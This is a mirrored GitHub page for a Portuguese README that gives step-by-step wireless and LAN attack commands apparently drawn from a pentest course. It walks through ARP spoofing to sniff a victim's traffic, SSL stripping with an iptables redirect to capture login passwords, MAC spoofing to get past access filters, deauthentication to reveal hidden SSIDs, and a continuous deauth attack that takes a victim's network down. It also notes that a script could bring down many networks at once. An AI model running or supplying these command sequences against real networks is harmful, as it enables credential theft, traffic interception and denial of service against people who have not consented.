https://github.com/jonathansilva/pentest-wireless
2020 - Passo a Passo baseado em um curso de Pentest para redes wireless ( 2015 )
https://github.com/jonathansilva/pentest-wireless
pentest wireless-penetration-testing
Last synced: 3 months ago
JSON representation
2020 - Passo a Passo baseado em um curso de Pentest para redes wireless ( 2015 )
- Host: GitHub
- URL: https://github.com/jonathansilva/pentest-wireless
- Owner: jonathansilva
- Created: 2020-12-02T15:28:16.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2025-01-27T03:00:00.000Z (4 months ago)
- Last Synced: 2025-01-27T04:18:15.755Z (4 months ago)
- Topics: pentest, wireless-penetration-testing
- Homepage:
- Size: 4.88 KB
- Stars: 11
- Watchers: 1
- Forks: 4
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
> Adaptador: TP-LINK TL-WN722N V1
- É obrigatório que seu adaptador tenha Modo de monitoramento e Injeção de pacotes
#### O que é AP, SSID, CH e MAC ?
- AP significa Access Point ou Ponto de Acesso... neste caso, seria o roteador- SSID é o nome da rede Wifi
- CH, Channel ou Canal, é onde o AP está sendo propagado
- Dispositivos que se conectam à rede, possui um código único assim que saem da fábrica, esse código se chama MAC ou MAC Address e é utilizado para que a rede tenha um falso controle de acesso... digo falso porque é possível burlar esse controle, alterando o endereço MAC
#### wlan0, at0 e eth0
Ao conectar o adaptador pela primeira vez, notei que o nome não seguia os "padrões" de nomes de adaptadores, então eu optei por trocar para wlan0
- at0 é a interface de monitoramento do adaptador... é por ela que a vítima irá se conectar à rede falsa
- eth0 é a placa de rede do computador### ARP Spoofing
Consiste em envenenar a tabela ARP do roteador da vítima, a fim de desviar o tráfego para a máquina atacante, fingindo ser o gateway e capturando os dados
Habilite o IP Forwarding
> echo 1 > /proc/sys/net/ipv4/ip_forward
ou
> sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
Para ver se foi habilitado, digite o comando:
> cat /proc/sys/net/ipv4/ip_forward
> sudo arpspoof -i eth0 -t ( IP da vítima ) ( IP do Gateway )
Abra outro terminal
Abra o Wireshark e selecione rede local eth0, depois clique no ícone de start
Procure pelos pacotes HTTP e fareje !!!
### Descobrindo senhas ( ARP Spoofing e SSL Strip )
> arpspoof -i eth0 -t ( IP da vítima ) ( IP do gateway )
Abra outro terminal e habilite o IP Forwarding
> echo 1 > /proc/sys/net/ipv4/ip_forward
Crie a regra de forma que todo tráfego direcionado como porta 80, seja redirecionado para uma porta, exemplo: 1337
> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337
> cd /pentest/web/sslstrip
> python sslstrip.py -p -l 1337
Abra outro terminal
> cd /pentest/web/sslstrip
> tail -f sslstrip.log
Acesse algum site que utilize SSL e tente fazer o login
### Burlando filtro de MAC ( MAC Spoofing )
O AP pode ser configurado para limitar quem pode se conectar a ele pelo filtro de MAC
Isso pode ser burlado através do clone de endereço MAC
> airmon-ng start wlan0
> airodump-ng wlan0
Escolha um MAC conectado na rede da vítima ( exibidos em STATION )
> ifconfig wlan0 down
> macchanger --mac ( MAC ) wlan0
> ifconfig wlan0 up
### Descobrindo SSID escondido ( Deauth Attack )
> airmon-ng start wlan0
> airodump-ng wlan0
Abra outro terminal e feche o anterior
> airodump-ng -c ( CH do AP ) wlan0
> aireplay-ng -0 2 -a MAC wlan0
O SSID será exibido no terminal anterior
### Derrubando rede wireless
- O roteador da vítima precisa ser de 2.4 GHz> ifconfig wlan0 down
> iwconfig wlan0 mode monitor
> ifconfig wlan0 up
> airmon-ng start wlan0
> airodump-ng wlan0
> airodump-ng wlan0 -c ( CH do AP ) --bssid ( MAC )
Abra outro terminal
> aireplay-ng -0 0 -a ( MAC ) wlan0- É possível criar um script que derrube várias redes ao mesmo tempo
O ataque MITM ( Fake AP, Rogue AP ) foi removido por estar incompleto e por problemas que tive ao executar num segundo momento
Consistia em redirecionar a vítima para uma página, hospedada localmente na máquina do atacante, sempre que ela fosse acessar algum site
Como exemplo, seria mostrado uma página solicitando a senha do Wifi